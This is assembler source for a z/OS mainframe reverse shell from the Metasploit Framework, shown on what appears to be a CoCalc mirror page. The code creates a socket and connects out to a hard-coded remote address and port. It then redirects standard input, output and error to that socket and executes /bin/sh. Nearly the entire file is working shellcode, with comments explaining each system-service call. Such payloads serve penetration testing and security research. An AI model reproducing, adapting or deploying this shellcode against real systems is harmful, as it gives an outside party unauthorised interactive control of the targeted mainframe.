CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/mainframe/shell_reverse_tcp.s
Views: 11780
1
         TITLE  'z/os Reverse Shell'

2
NEWREV   CSECT

3
NEWREV   AMODE 31

4
NEWREV   RMODE 31

5
***********************************************************************

6
*         SETUP registers and save areas                              *

7
***********************************************************************

8
MAIN     LR    7,15            # R7 is base register

9
         NILH  7,X'1FFF'       # ensure local address

10
         USING MAIN,0          # R8 for addressability

11
         DS    0H              # halfword boundaries

12
         LA    1,ZEROES(7)     # address byond which should be all 0s

13
         XC    0(204,1),0(1)   # clear zero area

14
         LA    13,SAVEAREA(7)  # address of save area

15
         LHI   8,8             # R8 has static 8

16
         LHI   9,1             # R9 has static 1

17
         LHI   10,2            # R10 has static 2

18


19
***********************************************************************

20
*        BPX1SOC set up socket                                        *

21
***********************************************************************

22
BSOC     LA    0,@@F1(7)       # USS callable svcs socket

23
         LA    3,8             # n parms

24
         LA    5,DOM(7)        # Relative addr of First parm

25
         ST    10,DOM(7)       # store a 2 for AF_INET

26
         ST     9,TYPE(7)      # store a 1 for sock_stream

27
         ST     9,DIM(7)       # store a 1 for dim_sock

28
         LA    15,CLORUN(7)    # address of generic load & run

29
         BASR  14,15           # Branch to load & run

30


31
***********************************************************************

32
*        BPX1CON (connect) connect to rmt host                        *

33
***********************************************************************

34
BCON     L     5,CLIFD(7)      # address of client file descriptor

35
         ST    5,CLIFD2(7)     # store for connection call

36
***  main processing **

37
         LA    1,SSTR(7)       # packed socket string

38
         LA    5,CLIFD2(7)     # dest for our sock str

39
         MVC   7(9,5),0(1)     # mv packed skt str to parm array

40
         LA    0,@@F2(7)       # USS callable svcs connect

41
         LA    3,6             # n parms for func call

42
         LA    5,CLIFD2(7)     # src parm list addr

43
         LA    15,CLORUN(7)    # address of generic load & run

44
         BASR  14,15           # Branch to load & run

45


46
*************************************************

47
* Preparte the child pid we'll spawn            *

48
*  0) Dupe all 3 file desc of CLIFD             *

49
*  1) dupe parent read fd to std input          *

50
*************************************************

51
         LHI   11,2            # Loop Counter R11=2

52
@LOOP1   BRC   15,LFCNTL       # call FCNTL for each FD(in,out,err)

53
@RET1    AHI   11,-1           # Decrement R11

54
         CIJ   11,-1,7,@LOOP1  # if R11 >= 0, loop

55


56
***********************************************************************

57
*        BPX1EXC (exec) execute /bin/sh                               *

58
***********************************************************************

59
LEXEC    LA    1,EXCPRM1(7)    # top of arg list

60
******************************************

61
****  load array of addr and constants ***

62
******************************************

63
         ST    10,EXARG1L(7)   # arg 1 len is 2

64
         LA    2,EXARG1L(7)    # addr of len of arg1

65
         ST    2,16(0,1)       # arg4 Addr of Arg Len Addrs

66
         LA    2,EXARG1(7)     # addr of arg1

67
         ST    2,20(0,1)       # arg5 Addr of Arg Addrs

68
         ST    9,EXARGC(7)     # store 1 in ARG Count

69
**************************************************************

70
*** call the exec function the normal way ********************

71
**************************************************************

72
         LA    0,@@EX1(7)      # USS callable svcs EXEC

73
         LA    3,13            # n parms

74
         LA    5,EXCPRM1(7)    # src parm list addr

75
         LA    15,CLORUN(7)    # address of generic load & run

76
         BASR  14,15           # Branch to load & run

77


78
***********************************************************************

79
*** BPX1FCT (fnctl) Edit our file descriptor **************************

80
***********************************************************************

81
LFCNTL   LA    0,@@FC1(7)      # USS callable svcs FNCTL

82
         ST    8,@ACT(7)       # 8 is our dupe2 action

83
         L     5,CLIFD(7)      # client file descriptor

84
         ST    5,@FFD(7)       # store as fnctl argument

85
         ST    11,@ARG(7)      # fd to clone

86
         LA    3,6             # n parms

87
         LA    5,@FFD(7)       # src parm list addr

88
         LA    15,CLORUN(7)    # address of generic load & run

89
         BASR  14,15           # Branch to load & run

90
         BRC   15,@RET1        # Return to caller

91


92
***********************************************************************

93
*  LOAD and run R0=func name, R3=n parms                              *

94
*     R5 = src parm list                                              *

95
***********************************************************************

96
CLORUN   ST    14,8(,13)       # store ret address

97
         XR    1,1             # zero R1

98
         SVC   8               # get func call addr for R0

99
         ST    0,12(13)        # Store returned addr in our SA

100
         L     15,12(13)       # Load func addr into R15

101
         LHI   6,20            # offset from SA of first parm

102
         LA    1,0(6,13)       # start of dest parm list

103
@LOOP2   ST    5,0(6,13)       # store parms address in parm

104
         AHI   3,-1            # decrement # parm

105
         CIJ   3,11,8,@FIX     #  haky fix for EXEC func

106
@RETX    AHI   6,4             # increment dest parm addr

107
         AHI   5,4             # increment src parm addr

108
         CIJ   3,0,7,@LOOP2    # loop until R3 = 0

109
         LA    5,0(6,13)

110
         AHI   5,-4

111
         OI    0(5),X'80'      # last parm first bit high

112
@FIN1    BALR  14,15           # call function

113
         L     14,8(,13)       # set up return address

114
         BCR   15,14           # return to caller

115
@FIX     AHI    5,4            # need extra byte skipped for exec

116
         BRC   15,@RETX

117


118
***********************************************************************

119
*        Arg Arrays, Constants and Save Area                          *

120
***********************************************************************

121
         DS    0F

122
*************************

123
****  Func Names     ****

124
*************************

125
@@F1     DC    CL8'BPX1SOC '

126
@@F2     DC    CL8'BPX1CON '

127
@@EX1    DC    CL8'BPX1EXC '   # callable svcs name

128
@@FC1    DC    CL8'BPX1FCT '

129
*        # BPX1EXC Constants

130
EXARG1   DC    CL2'sh'         # arg 1 to exec

131
*        # BPX1CON Constants

132
SSTR     DC    X'1002023039ac103d0a'

133
*        # BPX1EXC Arguments

134
EXCPRM1  DS    0F              # actual parm list of exec call

135
EXCMDL   DC    F'7'            # len of cmd to exec

136
EXCMD    DC    CL7'/bin/sh'    # command to exec

137
*********************************************************************

138
******* Below this line is filled in runtime, but at compile ********

139
******* is all zeroes, so it can be dropped from the shell- *********

140
******* code as it will be dynamically added back and the ***********

141
******* offsets are already calulated in the code *******************

142
*********************************************************************

143
ZEROES   DS    0F              # 51 4 byte slots

144
EXARGC   DC    F'0'            # num of arguments

145
EXARGS   DC    10XL4'00000000' # reminaing exec args

146
EXARG1L  DC    F'0'            # arg1 length

147
*        # BPX1FCT Arguments

148
@FFD     DC    F'0'            # file descriptor

149
@ACT     DC    F'0'            # fnctl action

150
@ARG     DC    F'0'            # argument to fnctl

151
@RETFD   DC    F'0'            # fd return

152
FR1      DC    F'0'            # rtn code

153
FR2      DC    F'0'            # rsn code

154
*        # BPX1SOC Arguments

155
DOM      DC    F'0'            # AF_INET = 2

156
TYPE     DC    F'0'            # sock stream = 1

157
PROTO    DC    F'0'            # protocol ip = 0

158
DIM      DC    F'0'            # dim_sock = 1

159
CLIFD    DC    F'0'            # client file descriptor

160
SR1      DC    F'0'            # rtn val

161
SR2      DC    F'0'            # rtn code

162
SR3      DC    F'0'            # rsn code

163
*        # BPX1CON Arguments

164
CLIFD2   DC    F'0'            # CLIFD

165
SOCKLEN  DC    F'0'            # length of Sock Struct

166
SRVSKT   DC    XL2'0000'       # srv socket struct

167
         DC    XL2'0000'       # port

168
         DC    XL4'00000000'   # RHOST 0.0.0.0

169
CR1      DC    F'0'            # rtn val

170
CR2      DC    F'0'            # rtn code

171
CR3      DC    F'0'            # rsn code

172
SAVEAREA DC    18XL4'00000000' # save area for pgm mgmt

173
EOFMARK  DC    X'deadbeef'     # eopgm marker for shellcode

174
         END   MAIN

175


176